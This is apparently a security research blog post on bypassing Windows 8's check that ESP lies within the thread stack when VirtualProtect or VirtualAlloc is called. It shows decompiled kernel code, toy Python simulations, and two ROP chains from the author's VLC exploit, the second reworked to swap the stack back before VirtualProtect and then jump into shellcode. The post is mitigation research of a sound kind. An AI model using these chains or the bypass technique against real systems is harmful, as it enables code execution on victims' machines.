Defeating Windows 8 ROP Mitigation

Windows 8 introduced a number of exploit mitigation features, including hardening of both the userland and kernel heaps, mitigation against kernel-mode NULL pointer dereferences, and protection against abuse of virtual function pointer tables. One feature that stood out to me appears to be designed to help mitigate exploits leveraging return-oriented programming (ROP).

Return-Oriented Programming

For those who don’t know, ROP is a generalization of the classic return-to-libc attack that involves leveraging small sequences of instructions, typically function epilogues, at known addresses to execute arbitrary code incrementally. This is achieved by controlling data pointed to by ESP, the stack pointer register, such that each ret instruction results in incrementing ESP and transferring execution to the next address chosen by the attacker.
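To make the mechanics concrete, here is a toy model of how a chain of returns walks an attacker-controlled stack. It is only a sketch: the gadget addresses, the two gadgets, and the `run_chain` helper are invented for illustration and do not correspond to any real binary.

```python
# Toy model of ROP control flow. This simulates only the stack mechanics,
# not real machine code. Gadget addresses and effects are hypothetical.

def run_chain(stack, gadgets):
    """Simulate ret-driven execution over an attacker-controlled stack."""
    regs = {"eax": 0, "ebx": 0}
    esp = 0                      # index into `stack`, standing in for ESP
    trace = []
    while esp < len(stack):
        addr = stack[esp]        # `ret` pops the next address...
        esp += 1                 # ...and increments ESP
        if addr not in gadgets:
            break                # unknown address: stop the simulation
        name, effect = gadgets[addr]
        trace.append(name)
        esp = effect(regs, stack, esp)   # a gadget may consume more stack
    return regs, trace


def pop_eax(regs, stack, esp):
    regs["eax"] = stack[esp]     # `pop eax` takes the next stack value
    return esp + 1


def mov_ebx_eax(regs, stack, esp):
    regs["ebx"] = regs["eax"]
    return esp


GADGETS = {
    0x1000: ("pop eax; ret", pop_eax),
    0x2000: ("mov ebx, eax; ret", mov_ebx_eax),
}

# The "payload" is just data: gadget addresses interleaved with operands.
chain = [0x1000, 0x41414141, 0x2000]
regs, trace = run_chain(chain, GADGETS)
```

The point of the model is that the attacker supplies no code at all, only a sequence of addresses and operands that existing instructions consume one `ret` at a time.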

Because finding sequences of useful instructions (known as “gadgets”) may be difficult depending on the exploitation scenario, most real ROP exploits use an initial ROP stager to create a writable and executable memory segment that a second-stage traditional shellcode can be copied into. Most frequently, VirtualProtect can be used to mark an existing executable segment writable, or VirtualAlloc can be used to create a fresh segment. Other variations also exist.

A second trait common to many ROP exploits is that the ROP payload itself often doesn’t live in the thread’s stack, due to either the nature of the vulnerability itself or limits on the attacker’s ability to introduce code into portions of the vulnerable application’s address space. Instead, it’s much more common for a ROP payload to be positioned in the heap and pivot the stack pointer into the heap, at which point the ROP payload can run.

Windows 8 ROP Mitigation

Microsoft has evidently been paying attention and noticed these two common factors. In an attempt to mitigate these types of exploits, Windows 8 implements a simple protection mechanism: every function associated with manipulating virtual memory, including the often-abused VirtualProtect and VirtualAlloc, now includes a check that the user-mode stack pointer, as saved in the trap frame, falls within the stack range recorded in the Thread Environment Block (TEB), that is, at or above DeallocationStack and below StackBase. If it does not, the kernel raises STATUS_STACK_BUFFER_OVERRUN and, unless a debugger handles the exception, terminates the process. Code courtesy of Alex Ionescu:

    char __cdecl PsValidateUserStack()
    {
      char Status; // al@1
      _ETHREAD *CurrentThread; // declaration missing from the listing
      _KTRAP_FRAME *TrapFrame; // ecx@3
      _TEB *Teb; // ecx@3
      void *.Eip; // [sp+10h] [bp-88h]@3
      unsigned int .Esp; // [sp+14h] [bp-84h]@3
      void *StackLimit; // [sp+18h] [bp-80h]@3
      void *StackBase; // [sp+1Ch] [bp-7Ch]@3
      _EXCEPTION_RECORD ExitStatus; // [sp+24h] [bp-74h]@6
      CPPEH_RECORD ms_exc; // [sp+80h] [bp-18h]@3

      CurrentThread = (_ETHREAD *)__readfsdword(0x124u);
      Status = LOBYTE(CurrentThread->Tcb.___u42.UserAffinity.Reserved[0]); // PreviousMode == User
      if ( Status )
      {
        __asm { bt      dword ptr [edx+58h], 13h }  // KernelStackResident, ReadyTransition, Alertable
        Status = _CF;
        if ( _CF != 1 )
        {
          TrapFrame = CurrentThread->Tcb.TrapFrame;
          .Esp = TrapFrame->HardwareEsp;
          .Eip = (void *)TrapFrame->Eip;
          Teb = (_TEB *)CurrentThread->Tcb.Teb;
          ms_exc.disabled = 0;
          StackLimit = Teb->DeallocationStack;
          StackBase = Teb->NtTib.StackBase;
          ms_exc.disabled = -2;
          Status = .Esp;
          if ( .Esp < (unsigned int)StackLimit || .Esp >= (unsigned int)StackBase )
          {
            memset(&ExitStatus, 0, 0x50u);
            ExitStatus.ExceptionCode = STATUS_STACK_BUFFER_OVERRUN;
            ExitStatus.ExceptionAddress = .Eip;
            ExitStatus.NumberParameters = 2;
            ExitStatus.ExceptionInformation[0] = 4;
            ExitStatus.ExceptionInformation[1] = .Esp;
            Status = DbgkForwardException(&ExitStatus, 1, 1);
            if ( !Status )
            {
              Status = DbgkForwardException(&ExitStatus, 0, 1);
              if ( !Status )
                Status = ZwTerminateProcess((HANDLE)0xFFFFFFFF, ExitStatus.ExceptionCode);
            }
          }
        }
      }
      return Status;
    }
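Stripped of the kernel plumbing, the decision in the listing above reduces to one range comparison. The following is a simplified model of that comparison only, not the kernel's code: the function name and the sample addresses are assumptions chosen for illustration, and the PreviousMode test and exception forwarding are omitted.

```python
def stack_pointer_is_valid(esp, deallocation_stack, stack_base):
    """Model of the range test: DeallocationStack <= ESP < StackBase."""
    return deallocation_stack <= esp < stack_base


# Hypothetical addresses for a thread stack and a heap-resident payload.
DEALLOCATION_STACK = 0x00030000
STACK_BASE = 0x00130000

on_stack = stack_pointer_is_valid(0x0012FF00, DEALLOCATION_STACK, STACK_BASE)
on_heap = stack_pointer_is_valid(0x0C0C0C0C, DEALLOCATION_STACK, STACK_BASE)
```

With these sample values, `on_stack` is true and `on_heap` is false, which is exactly the distinction the mitigation relies on.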

As a result, exploits that leverage a ROP payload stored in the heap cannot return into VirtualProtect or VirtualAlloc to create a writable and executable segment. While this provides yet another hurdle for exploit writers, it’s fairly easy to bypass. Besides writing a full ROP payload that doesn’t need a second stage, which may be difficult depending on the availability of gadgets, one simple way of avoiding this protection is to give it what it wants: ensure ESP points into the current thread’s stack whenever virtual memory functions are called. In the example below, I’ll assume the attacker has access to the original stack pointer through some register, as is the case when a pivot is performed using an xchg instruction. If this isn’t the case, it may be worth investigating ways of finding the stack at runtime.

Bypassing the Mitigation

To demonstrate, let’s take the very basic ROP payload I used for a VLC exploit as an example. After triggering the vulnerability, I pivot the stack pointer into the heap using a gadget that executes the following:

    xchg esi, esp
    retn

In this case, the ESI register contains a pointer to heap data I control, so by pivoting the stack pointer into this region, I can execute my first-stage ROP payload:

    rop = [
        rop_base + 0x1022,      # retn

        # Call VirtualProtect()
        rop_base + 0x2c283,     # pop eax; retn
        rop_base + 0x1212a4,    # IAT entry for VirtualProtect -> eax
        rop_base + 0x12fda,     # mov eax,DWORD PTR [eax]
        rop_base + 0x29d13,     # jmp eax

        rop_base + 0x1022,      # retn (return address for VirtualProtect)
        heap & ~0xfff,          # lpAddress
        0x60000,                # dwSize
        0x40,                   # flNewProtect
        heap - 0x1000,          # lpflOldProtect

        # Enough of this ROP business...
        rop_base + 0xdace8      # push esp; retn
    ]

This payload pulls the address of VirtualProtect from the Import Address Table (IAT), calls it to mark the heap executable, and jumps into the newly executable heap to run a second-stage traditional shellcode.
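For readers who have not built one of these before, a list like this is typically flattened into little-endian 32-bit values before it is placed in memory. The sketch below shows one way to do that with Python's `struct` module; `pack_chain`, `ROP_BASE`, and `HEAP` are hypothetical names and values, not taken from the actual exploit.

```python
import struct


def pack_chain(entries):
    """Pack a list of 32-bit values as little-endian DWORDs."""
    masked = [value & 0xFFFFFFFF for value in entries]   # keep each value in 32 bits
    return struct.pack("<%dI" % len(masked), *masked)


# Hypothetical base addresses, for illustration only.
ROP_BASE = 0x10000000
HEAP = 0x0C0C0C0C

sample = [
    ROP_BASE + 0x1022,   # gadget address
    HEAP & ~0xFFF,       # page-aligned lpAddress
    0x60000,             # dwSize
    0x40,                # flNewProtect (PAGE_EXECUTE_READWRITE)
]
payload = pack_chain(sample)
```

Each entry occupies four bytes, so the length of the packed payload is always four times the number of entries in the list.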

Because ESP points into the heap at the time of the VirtualProtect call, this exploit would fail due to the newly introduced mitigation in Windows 8. However, it’s relatively simple to adapt it to bypass this mitigation. Below is the updated ROP payload:

    rop = [
        rop_base + 0x1022,      # retn

        # Write lpflOldProtect
        rop_base + 0x2c283,     # pop eax; retn
        heap - 0x1000,          # lpflOldProtect -> eax
        rop_base + 0x1db4f,     # mov [esi],eax; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn

        # Write flNewProtect
        rop_base + 0x2c283,     # pop eax; retn
        0x40,                   # flNewProtect -> eax
        rop_base + 0x1db4f,     # mov [esi],eax; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn

        # Write dwSize
        rop_base + 0x2c283,     # pop eax; retn
        0x60000,                # dwSize -> eax
        rop_base + 0x1db4f,     # mov [esi],eax; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn

        # Write lpAddress
        rop_base + 0x2c283,     # pop eax; retn
        heap & ~0xfff,          # lpAddress -> eax
        rop_base + 0x1db4f,     # mov [esi],eax; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn

        # Write &Pivot
        rop_base + 0x2c283,     # pop eax; retn
        rop_base + 0x229a5,     # &pivot -> eax
        rop_base + 0x1db4f,     # mov [esi],eax; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn
        rop_base + 0x3ab5e,     # dec esi; retn

        # Write &VirtualProtect
        rop_base + 0x2c283,     # pop eax; retn
        rop_base + 0x1212a4,    # IAT entry for VirtualProtect -> eax
        rop_base + 0x12fda,     # mov eax,DWORD PTR [eax]
        rop_base + 0x1db4f,     # mov [esi],eax; retn

        # Pivot ESP
        rop_base + 0x229a5,     # xchg esi,esp; retn

        # Jump into shellcode
        rop_base + 0xdace8      # push esp; retn
    ]

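This is a very crude example, but I think it demonstrates the idea just fine. I write the arguments to VirtualProtect onto the original stack, whose address is held in the ESI register, one at a time and from the last argument to the first, moving ESI down four bytes after each write. In the slot that VirtualProtect will return through, I place the address of the pivot gadget, and below that the address of VirtualProtect itself. Finally, to trigger the whole thing, I return into my pivot gadget, which swaps ESP back to the original stack and returns into VirtualProtect. ESP now points into the thread’s stack, so the check passes. When VirtualProtect returns, it lands on the pivot gadget a second time; since ESI is preserved across the call and still holds the heap pointer, this swaps ESP back to the heap, and the payload continues into the shellcode.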
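The order of the writes is easier to follow when the resulting frame is laid out explicitly. The sketch below models the repeated `mov [esi],eax` and four `dec esi` steps against a dictionary standing in for memory. All addresses (`ORIGINAL_ESP`, `VIRTUAL_PROTECT`, `PIVOT`, `HEAP`) are placeholders picked for illustration, and `build_frame` is a hypothetical helper.

```python
def build_frame(original_esp, values):
    """Model the write sequence: store a value, then move ESI down 4 bytes."""
    memory = {}
    esi = original_esp
    for index, value in enumerate(values):
        memory[esi] = value              # mov [esi], eax
        if index != len(values) - 1:
            esi -= 4                     # four `dec esi` gadgets
    return esi, memory


# Placeholder addresses, not taken from a real process.
ORIGINAL_ESP = 0x0012FF00
VIRTUAL_PROTECT = 0x7C801AD4
PIVOT = 0x100229A5
HEAP = 0x0C0C0C0C

# Values in the order the chain writes them (last argument first).
writes = [
    HEAP - 0x1000,     # lpflOldProtect
    0x40,              # flNewProtect
    0x60000,           # dwSize
    HEAP & ~0xFFF,     # lpAddress
    PIVOT,             # return address for VirtualProtect
    VIRTUAL_PROTECT,   # target of the `retn` after the pivot
]
esi, memory = build_frame(ORIGINAL_ESP, writes)

# Frame as seen from the new ESP, lowest address first.
frame = [memory[esi + 4 * i] for i in range(len(writes))]
```

Read from the lowest address upward, `frame` holds the VirtualProtect address, the pivot as return address, and then the four arguments in declaration order, which is the layout a stdcall function expects on entry.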

In this case, adapting the exploit added an extra 124 bytes to the payload (31 additional 4-byte entries), but that was mostly due to the fact that I was limited on gadget availability and had to resort to decrementing ESI one byte at a time. It’s probably possible to optimize this example with some extra work. In other cases, I’d expect it to be possible to implement this technique with much less overhead.
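The 124-byte figure can be checked by counting entries in the two payloads. The short calculation below does that, and also estimates the saving if a single gadget that subtracts 4 from ESI were available. That gadget is purely an assumption for the sake of the estimate; no such gadget is claimed to exist in the target.

```python
DWORD = 4

# Entry counts taken from the two payload listings.
original_entries = 11
per_write_block = 7          # pop eax, value, mov [esi],eax, 4x dec esi
final_write_block = 4        # pop eax, IAT entry, mov eax,[eax], mov [esi],eax
updated_entries = 1 + 5 * per_write_block + final_write_block + 1 + 1

overhead = (updated_entries - original_entries) * DWORD

# Hypothetical: one `sub esi, 4; retn` gadget replaces four `dec esi` gadgets,
# saving three entries in each of the five write blocks.
optimized_entries = updated_entries - 5 * 3
optimized_overhead = (optimized_entries - original_entries) * DWORD
```

Under that assumption the overhead would drop from 124 bytes to 64 bytes, which gives a rough sense of how much of the cost comes from the byte-wise decrements.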